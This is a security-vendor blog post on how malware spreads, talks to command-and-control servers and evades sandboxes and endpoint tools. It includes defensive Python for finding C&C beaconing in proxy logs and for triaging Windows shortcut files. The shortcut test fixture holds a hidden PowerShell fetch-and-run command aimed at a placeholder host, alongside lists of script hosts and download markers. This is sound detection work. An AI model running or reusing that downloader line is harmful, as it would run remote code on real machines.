How Malware Works – Malicious Strategies and Tactics

Posted by Lastline on May 10, 2018

Understanding how malware works, and in particular, the strategies and tactics most often used by malware authors is vitally important for cybersecurity professionals. In other blog posts, Lastline provides a brief history of malware and basic malware types. In this post, we’ll look at some of the common methods that malware authors use to distribute, control, and hide malicious code.

How Malware is Distributed

AV-Test, one of the most renowned institutions for testing Anti-Malware products, reports that cybercriminals push 250,000 new malicious programs into the wild every day. So, what tactics do cybercriminals use to distribute this massive amount of malware? Although new methods are constantly emerging, most malware is delivered in the following ways.

Command and Control – How Cybercriminals Manage Malware

To be useful, most malware must communicate with the cybercriminals who own and control it. The malware must transmit stolen data, and the perpetrators need to coordinate how and when sophisticated attacks are launched and propagated and, in some cases, how the malware terminates and remains undetected.

This necessary communication is generally handled by command-and-control servers established by the cybercriminals. These command-and-control servers, also called C&Cs or C2s, are used by the attackers to communicate with compromised computers, websites, smartphones, routers, IoT devices, and other networking equipment.

Cybercriminals use C&Cs to instruct and manage individual instances of malware or entire botnets of compromised systems. Most malware is designed to respond to specific instructions received from one or more C&C servers. Using the associated C&C server(s), the attackers direct the malware to perform a number of malicious actions, including:

Upload reports on the malware's status and the results of C&C commands

Install upgrades to the malware, or additional pieces of malware, to expand the attack

Install keyloggers to collect sensitive information such as credit card numbers or login credentials

Send spam or phishing emails

Launch coordinated DDoS attacks

Exfiltrate stolen data back to the criminal: login credentials, sensitive user data, payment card numbers, corporate intellectual property, financial data, etc.

Advanced malware detection products monitor network traffic for connections to known C&Cs, and for traffic that contains C&C communications. When these tools discover malicious traffic, administrators can block the connections and, in some cases, identify and remove the responsible malware.

Malware authors use several strategies for hiding their C&C communications from malware detection systems. For example, cybercriminals often tunnel C&C traffic over channels that blend into ordinary network activity, such as Internet Relay Chat (IRC), peer-to-peer (P2P) networks, and social networks like Facebook and Twitter. The most advanced methods can switch C&C servers very quickly to stay ahead of blocklists, for example by rotating many IP addresses behind a single hostname (fast flux) or by generating fresh domain names on a schedule that only the malware and its operator can predict (a domain generation algorithm, or DGA). Some C&C servers have a lifespan of just minutes before another server replaces them.
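The three detections the previous two paragraphs describe (matching destinations against a list of known C&Cs, spotting the regular check-in rhythm of a bot, and spotting the random-looking hostnames a DGA produces) can be expressed as a short log-triage script. The following is an added example written for this page, not Lastline's product code; the proxy log lines and the one-entry blocklist are constructed for the example, and the thresholds (five or more connections, coefficient of variation of the gaps at most 0.2, label length at least 10 with entropy at least 3.3 bits per character) are illustrative starting points rather than tuned values.

```python
"""Find C&C candidates in an outbound proxy log: blocklist hits, regular beacons, DGA-like names.

The log lines below are constructed for this example, not taken from a real network.
Format per line: <ISO-8601 time> <source IP> <destination host> <bytes sent>
"""
import math
import re
from collections import defaultdict
from datetime import datetime

SAMPLE_LOG = """\
2018-05-10T09:00:00 10.0.0.5 www.example.com 512
2018-05-10T09:00:03 10.0.0.5 cdn.example.net 2048
2018-05-10T09:00:10 10.0.0.7 kx7w3p9qzv2ml.top 128
2018-05-10T09:01:10 10.0.0.7 kx7w3p9qzv2ml.top 130
2018-05-10T09:02:10 10.0.0.7 kx7w3p9qzv2ml.top 127
2018-05-10T09:03:11 10.0.0.7 kx7w3p9qzv2ml.top 129
2018-05-10T09:04:10 10.0.0.7 kx7w3p9qzv2ml.top 128
2018-05-10T09:04:30 10.0.0.5 mail.example.com 900
2018-05-10T09:05:10 10.0.0.7 kx7w3p9qzv2ml.top 131
2018-05-10T09:06:00 10.0.0.9 known-bad.example.org 64
"""

# Hypothetical blocklist entry; in practice this set comes from a threat-intelligence feed.
KNOWN_C2 = {"known-bad.example.org"}

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d+)$")


def parse_log(text):
    """Return (timestamp, src, host, bytes) tuples; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, src, host, nbytes = m.groups()
            events.append((datetime.fromisoformat(ts), src, host.lower(), int(nbytes)))
    return events


def shannon_entropy(s):
    """Bits of entropy per character; random-looking DGA labels score high."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def dga_like(host, min_len=10, min_entropy=3.3):
    """Heuristic: the label directly left of the TLD is long and high-entropy."""
    labels = host.split(".")
    label = labels[-2] if len(labels) >= 2 else labels[0]
    return len(label) >= min_len and shannon_entropy(label) >= min_entropy


def beacon_score(times, min_events=5):
    """Mean gap (seconds) and coefficient of variation of the gaps between
    connections, or None when there are too few events to judge regularity."""
    if len(times) < min_events:
        return None
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    mean = sum(gaps) / len(gaps)
    if mean <= 0:
        return None
    stddev = math.sqrt(sum((g - mean) ** 2 for g in gaps) / len(gaps))
    return mean, stddev / mean


def find_c2_candidates(events, max_cv=0.2):
    """Group connections by (src, host) and report pairs with at least one C&C indicator."""
    by_pair = defaultdict(list)
    for ts, src, host, _ in events:
        by_pair[(src, host)].append(ts)
    findings = []
    for (src, host), times in sorted(by_pair.items()):
        reasons = []
        if host in KNOWN_C2:
            reasons.append("destination on C&C blocklist")
        score = beacon_score(times)
        if score is not None and score[1] <= max_cv:
            reasons.append(f"beacons every ~{score[0]:.0f}s (cv={score[1]:.2f}, n={len(times)})")
        if dga_like(host):
            reasons.append("DGA-like hostname (long, high-entropy label)")
        if reasons:
            findings.append((src, host, reasons))
    return findings


if __name__ == "__main__":
    for src, host, reasons in find_c2_candidates(parse_log(SAMPLE_LOG)):
        print(f"{src} -> {host}: {'; '.join(reasons)}")
```

Run on the constructed log, 10.0.0.7 is reported for both its once-a-minute rhythm and its random-looking domain, 10.0.0.9 only for the blocklist hit, and 10.0.0.5 not at all. The beacon check is deliberately simple: real bots add jitter to their sleep, so in production you would widen `max_cv`, look at longer windows, and combine the score with the other indicators rather than alerting on regularity alone.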

How Malware Hides – Evasion Tactics

Malware authors are very creative. They use countless tactics to lessen the likelihood that security tools will detect their malware. Earlier in this post when we discussed malware distribution, we covered how cybercriminals hide malware in websites, attachments, and advertisements during the initial delivery phase of an attack.

When a user or their browser attempts to download an object, a sandbox is often used to detonate it first and observe whether it behaves maliciously before it reaches the user. To counter this, malware authors deploy numerous tactics to recognize or outlast sandboxes. If malware does find its way onto an endpoint, its designers use additional strategies to maintain stealth there.

Sandbox Evasion Tactics

Fragmentation: The malware is split into several components, each of which looks harmless on its own; the malicious behavior appears only when the targeted system reassembles the code, so a sandbox that examines one component at a time sees nothing to flag.

Time Delays: The malware remains idle for an extended period, performing no malicious activity until (the criminal hopes) the sandbox has given up and released the file to the intended user. Sandboxes typically run a sample for only a few minutes, so a long sleep at startup can outlast the analysis window.

User Action Delays: Some malware does nothing malicious until a user performs a specific action (e.g. a mouse click, pressing a key, opening or closing a file, exiting the program), activity that an automated sandbox may never generate.

Return-Oriented Programming (ROP): Rather than injecting new executable code into another process, the malware chains together short instruction sequences ("gadgets") that already exist in that process's legitimate code, steering execution from one gadget to the next by overwriting the return addresses on the stack. Because no new code is written to memory, detection that looks for injected code pages can miss it.

Rootkits: A rootkit is a program (or set of programs) that hides malicious code and activity by subverting the lower layers of the operating system, such as the kernel or device drivers, so that the operating system itself misreports the files, processes, and network connections the malware uses.

Polymorphism: Polymorphic malware is so named because it morphs, or mutates, into many forms, and does so very quickly, constantly creating new variants of itself. The functionality stays the same while the bytes change, which makes it nearly impossible to detect using signature-based malware detection tools alone.

To learn more about sandbox evasion tactics, see Lastline’s paper An Introduction to Advanced Malware and How it Avoids Detection.

Endpoint Evasion Tactics

In addition to using covert C&C communication channels as discussed earlier, malware authors use a number of tactics to avoid having their malware detected after installation. Here are just a few of those tactics:

Unique Signatures: Most malware today is one of a kind. To avoid detection by signature-based anti-virus solutions, cybercriminals have built automated systems that create a unique malicious object for each installation, so no two victims receive the same file.

Critical System Files: Malware often masquerades as a legitimate system file. When original system files are replaced with trojanized versions that keep the same name and location, endpoint malware detection systems have difficulty spotting the malicious code.

Disabling Endpoint Security: Some malware evades certain endpoint antivirus tools by disabling the tool outright or by adding an exclusion for its own files and folders.

Windows Registry: Hiding malicious code within the Windows registry is a common tactic because no additional files are written to disk; a small loader reads the payload from a registry value and runs it in memory.

Temporary Files, Folders or Directories: Malware scans are often configured to analyze a specific set of files and folders. Malware authors therefore use or create temporary or uncommon files and folders that aren't typically scanned, and hide their code there.

In Shortcuts: Shell Link Binary Files (.lnk), commonly known as shortcuts, have been used by malware writers for years to hide and launch malware, because a shortcut can point at a scripting host such as PowerShell and hand it arbitrary arguments while showing the user an innocuous icon. Recently, we've seen a resurgence of their usage.

Within Macros: Inserting malicious macros inside otherwise legitimate-looking documents such as Microsoft Excel files has reemerged as a popular technique to hide malware.
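Shortcuts are a good place to see how an analyst turns one of the tactics above into a check. A .lnk file is a documented binary format (MS-SHLLNK): a fixed 76-byte header carrying flags and a ShowCommand value, optional ID-list and link-info blocks, and then a sequence of length-prefixed strings that include the target path, working directory and command-line arguments. The parser below is an added example written for this page, not Lastline's code; it reads those fields and applies a few triage rules (target is a script host, window starts minimized, arguments contain download or obfuscation markers). The two shortcuts it inspects are built in code as test fixtures, with a non-resolvable example.invalid URL, and the marker lists are illustrative rather than complete.

```python
"""Parse Windows Shell Link (.lnk) files and triage what they launch.

Layout follows MS-SHLLNK: a 76-byte ShellLinkHeader, optional LinkTargetIDList
and LinkInfo blocks (skipped here), then StringData. The sample shortcuts at
the bottom are constructed fixtures, not files from a real incident.
"""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWNORMAL = 1
SW_SHOWMINNOACTIVE = 7  # window starts minimized, a favourite of malicious shortcuts

# StringData items appear in this fixed order, each present only if its flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def _read_string(data, off, is_unicode):
    """Read one StringData item: uint16 CountCharacters followed by the characters."""
    (count,) = struct.unpack_from("<H", data, off)
    off += 2
    if is_unicode:
        return data[off:off + 2 * count].decode("utf-16-le"), off + 2 * count
    return data[off:off + count].decode("cp1252", "replace"), off + count


def parse_lnk(data):
    """Return header flags, ShowCommand and the StringData fields of a .lnk blob."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:0x14] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", data, 0x14)
    (show_cmd,) = struct.unpack_from("<I", data, 0x3C)
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (uint16) then the IDList itself
        (size,) = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:                # LinkInfoSize (uint32) counts itself
        (size,) = struct.unpack_from("<I", data, off)
        off += size
    fields = {"flags": flags, "show_command": show_cmd}
    for flag, name in STRING_FIELDS:
        if flags & flag:
            fields[name], off = _read_string(data, off, bool(flags & IS_UNICODE))
    return fields


SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript",
                "rundll32", "regsvr32", "certutil")
ARG_MARKERS = ("-enc", "encodedcommand", "hidden", "bypass", "http", "iex",
               "downloadstring", "frombase64string")


def triage_lnk(fields):
    """Return the reasons a shortcut deserves analyst attention ([] if none)."""
    reasons = []
    target = (fields.get("relative_path", "") + " " + fields.get("working_dir", "")).lower()
    args = fields.get("arguments", "").lower()
    for host in SCRIPT_HOSTS:
        if host in target:
            reasons.append(f"target is a script host / LOLBin ({host})")
            break
    if fields.get("show_command") == SW_SHOWMINNOACTIVE:
        reasons.append("window is launched minimized (SW_SHOWMINNOACTIVE)")
    for marker in ARG_MARKERS:
        if marker in args:
            reasons.append(f"arguments contain '{marker}'")
    if len(args) > 200:
        reasons.append(f"unusually long argument string ({len(args)} chars)")
    return reasons


def build_lnk(relative_path, working_dir, arguments, show_command=SW_SHOWNORMAL):
    """Build a minimal .lnk: header plus three StringData items (test fixture only)."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def item(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + item(relative_path) + item(working_dir) + item(arguments)


# Constructed fixtures: a shortcut that launches a hidden PowerShell downloader, and a benign one.
SUSPICIOUS_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"C:\Windows\System32",
    "-w hidden -nop -ep bypass -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage')\"",
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN_LNK = build_lnk(r"..\Program Files\Notepad++\notepad++.exe",
                       r"C:\Program Files\Notepad++", "")

if __name__ == "__main__":
    for label, blob in (("suspicious", SUSPICIOUS_LNK), ("benign", BENIGN_LNK)):
        fields = parse_lnk(blob)
        print(label, fields.get("relative_path"), fields.get("arguments"))
        for reason in triage_lnk(fields):
            print("  !", reason)
```

To run it against real shortcuts, read each file with `open(path, "rb").read()` and pass the bytes to `parse_lnk`; the parser skips the ID-list and link-info blocks that real shortcuts carry, so the string fields line up the same way. Note what the rules do not cover: a shortcut whose arguments are padded with hundreds of spaces so the dangerous part scrolls out of the Properties dialog is caught only by the length rule, and an attacker who launches a renamed copy of a script host defeats the name match, which is why the ShowCommand and argument markers are checked independently.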

To Safeguard Your Company Against a Cyberbreach—Think Like a Cybercriminal

By understanding the strategies and tactics that malware authors use when creating malicious objects, security professionals stand a better chance of establishing effective cybersecurity policies and implementing successful tools to detect and prevent data breaches.

To learn more about how malware works and what organizations can do to safeguard themselves against even the most advanced malware, you might want to read Lastline’s paper An Introduction to Advanced Malware and How to Avoid Detection.